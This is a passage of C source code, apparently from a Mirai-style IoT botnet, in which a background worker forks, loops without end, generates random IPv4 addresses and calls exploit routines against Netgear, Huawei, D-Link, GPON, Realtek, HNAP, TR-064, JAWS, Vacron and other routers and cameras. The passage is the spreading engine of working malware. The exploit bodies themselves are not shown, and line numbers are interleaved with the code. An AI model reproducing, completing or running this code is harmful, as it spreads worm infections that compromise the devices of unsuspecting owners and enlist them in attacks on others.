	ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;

510
	ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;

511
	ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;

512
	ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;

513
	

514
	sprintf(netgear_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(netgear_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);

515
	sprintf(netgear_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(netgear_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);

516
	sprintf(netgear_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(netgear_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);

517
	sprintf(netgear_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(netgear_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);

518
	sprintf(netgear_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(netgear_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);

519
	

520
	exploit_socket_netgear(netgear_ip1);exploit_socket_netgear(netgear_ip2);exploit_socket_netgear(netgear_ip3);exploit_socket_netgear(netgear_ip4);exploit_socket_netgear(netgear_ip5);

521
	exploit_socket_netgear(netgear_ip6);exploit_socket_netgear(netgear_ip7);exploit_socket_netgear(netgear_ip8);exploit_socket_netgear(netgear_ip9);exploit_socket_netgear(netgear_ip10);

522
}

523


524
void HUAWEI_IPGen()

525
{	

526
	char huawei_ip1[16] = {0};char huawei_ip2[16] = {0};char huawei_ip3[16] = {0};char huawei_ip4[16] = {0};char huawei_ip5[16] = {0};

527


528
	srand(time(NULL));

529
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;

530
	ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;

531
	ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;

532
	ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;

533
	

534
	sprintf(huawei_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(huawei_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);

535
	sprintf(huawei_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(huawei_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);

536
	sprintf(huawei_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);

537
	

538
	exploit_socket_huawei(huawei_ip1);

539
	exploit_socket_huawei(huawei_ip2);

540
	exploit_socket_huawei(huawei_ip3);

541
	exploit_socket_huawei(huawei_ip4);

542
	exploit_socket_huawei(huawei_ip5);

543
}

544


545
void TR064_IPGen()

546
{	

547
	char tr_ip1[16] = {0};

548


549
	srand(time(NULL));

550
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;

551
	ipState[2] = rand() % 255;ipState[3] = rand() % 255;

552
	

553
	sprintf(tr_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

554
	

555
	exploit_socket_tr064(tr_ip1);

556
}

557


558
void HNAP_IPGen()

559
{	

560
	char hnap_ip1[16] = {0};

561


562
	srand(time(NULL));

563
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;

564
	ipState[2] = rand() % 255;ipState[3] = rand() % 255;

565
	

566
	sprintf(hnap_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

567
	

568
	exploit_socket_hnap(hnap_ip1);

569
}

570


571
void CROSSWEB_IPGen()

572
{	

573
	char crossweb_ip1[16] = {0};

574


575
	srand(time(NULL));

576
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;

577
	ipState[2] = rand() % 255;ipState[3] = rand() % 255;

578
	

579
	sprintf(crossweb_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

580
	

581
	exploit_socket_crossweb(crossweb_ip1);

582
}

583


584
void JAWS_IPGen()

585
{	

586
	char jaws_ip1[16] = {0};

587


588
	srand(time(NULL));

589
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;

590
	ipState[2] = rand() % 255;ipState[3] = rand() % 255;

591
	

592
	sprintf(jaws_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

593
	

594
	exploit_socket_jaws(jaws_ip1);

595
}

596


597
void DLINK_IPGen()

598
{	

599
	char dlink_ip1[16] = {0};

600


601
	srand(time(NULL));

602
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;

603
	ipState[2] = rand() % 255;ipState[3] = rand() % 255;

604
	

605
	sprintf(dlink_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

606
	

607
	exploit_socket_dlink(dlink_ip1);

608
}

609


610
void R7000_IPGen()

611
{	

612
	char r7000_ip1[16] = {0};

613


614
	srand(time(NULL));

615
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;

616
	ipState[2] = rand() % 255;ipState[3] = rand() % 255;

617
	

618
	sprintf(r7000_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

619
	

620
	exploit_socket_r7064(r7000_ip1);

621
}

622


623
void VARCON_IPGen()

624
{	

625
	char varcon_ip1[16] = {0};

626


627
	srand(time(NULL));

628
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;

629
	ipState[2] = rand() % 255;ipState[3] = rand() % 255;

630
	

631
	sprintf(varcon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

632
	

633
	exploit_socket_vacron(varcon_ip1);

634
}

635


636
void AWSEC2_IPGen()

637
{	

638
	char awsec2_ip1[16] = {0};

639


640
	srand(time(NULL));

641
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;

642
	ipState[2] = rand() % 255;ipState[3] = rand() % 255;

643
	

644
	sprintf(awsec2_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

645
	

646
	exploit_socket_awsec2(awsec2_ip1);

647
}

648


649
void exploit_worker(void)

650
{	

651
	int i = 0;

652
    scanner_pid = fork();

653
	

654
    if (scanner_pid > 0 || scanner_pid == -1)

655
        return;

656
	restart:

657
	i++;

658
	if (i > 10)

659
	{

660
		#ifdef DEBUG

661
			printf("[sleep] active for 12 sec\n");

662
		#endif

663
		sleep(12);

664
		i = i - 10;

665
		goto restart;

666
	}

667
		usleep(300000);

668
		GPON8080_IPGen();

669
		usleep(300000);

670
		GPON80_IPGen();

671
		usleep(300000);

672
		REALTEK_IPGen();

673
		usleep(300000);

674
		NETGEAR_IPGen();

675
		usleep(300000);

676
		HUAWEI_IPGen();

677
		usleep(300000);

678
		TR064_IPGen();

679
		usleep(300000);

680
		HNAP_IPGen();

681
		usleep(300000);

682
		CROSSWEB_IPGen();

683
		usleep(300000);

684
		JAWS_IPGen();

685
		usleep(300000);

686
		DLINK_IPGen();

687
		usleep(300000);

688
		R7000_IPGen();

689
		usleep(300000);

690
		VARCON_IPGen();

691
    usleep(300000);

692
		AWSEC2_IPGen();

693
		goto restart;

694
}

695


696
void exploit_kill(void)

697
{

698
    kill(scanner_pid, 9);

699
}

700


701
#endif

702


703